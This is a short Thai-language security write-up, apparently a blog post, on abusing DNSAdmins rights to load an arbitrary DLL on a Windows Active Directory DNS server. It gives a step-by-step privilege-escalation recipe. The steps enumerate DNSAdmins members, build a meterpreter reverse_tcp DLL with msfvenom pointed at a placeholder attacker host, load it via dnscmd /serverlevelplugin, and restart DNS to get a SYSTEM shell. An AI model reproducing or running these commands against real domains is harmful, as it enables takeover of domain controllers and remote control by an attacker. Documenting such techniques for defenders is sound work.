พบ feature ที่ทำให้ DNS Admin กลายเป็นสร้าง load dll ใดๆก็ได้บน Windows Active Directory Server
Ankit Joshi ซึ่งเป็น security คนหนึ่งได้พบว่าหาก user ใดๆที่เป็น DNS Admin สามารถใช้คำสั่งเพื่อทำการ load dll ใดๆก็ได้บน Windows Active Directory Server ซึ่งเมื่อดัดแปลงการโหลดแล้วจะทำให้สามารถยึดเครื่องหรือทำสิ่งใดๆจากเครื่อง AD ได้
1. list user ที่เป็น dns admin user
1 2 3 4 |
net localgroup dnsadmins /domain หรือ import-module activedirectory get-adgroupmember -Identity "DNSAdmins" |
2. Login เข้า DNS Server โดยการใช้งานคำสั่ง dnscmd จำเป็นต้องมีการ enable ด้วย ซึ่งการ enable DNSCMD feature บน DNS Server tools ทำได้โดย
Control Panel -> Programs and Features -> Turn Windows features on or off -> Remote Server Administration Tools -> Role Administration Tools -> DNS Server Tools
3. Create malicious dll ด้วย Msfvenom
1 |
msfvenom --platform windows -a x86 -e x86/shikata_ga_nai -p windows/meterpreter/reverse_tcp LHOST=<ATTACKER Server> LPORT=<Attacker Port> -f dll -o malicious.dll |
4. ทำ file sharing เพื่อให้สามารถเรียกถึงได้
5. Run dll บนเครื่อง AD ผ่านการใช้คำสั่ง dnscmd ที่ถูก enable ใน DNS Server
1 |
dnscmd <AD Server Name> /config /serverlevelplugin <path of dll> |
6. Restart DNS Service
7. จะได้รับ connection มาที่ Metasploit ที่เรา Listen ไว้จาก AD Server เลยทันที โดย session ที่ได้นั้นจะได้เป็น SYSTEM User อีกด้วย (เพราะ dns.exe รันด้วยสิทธิ์ของ SYSTEM)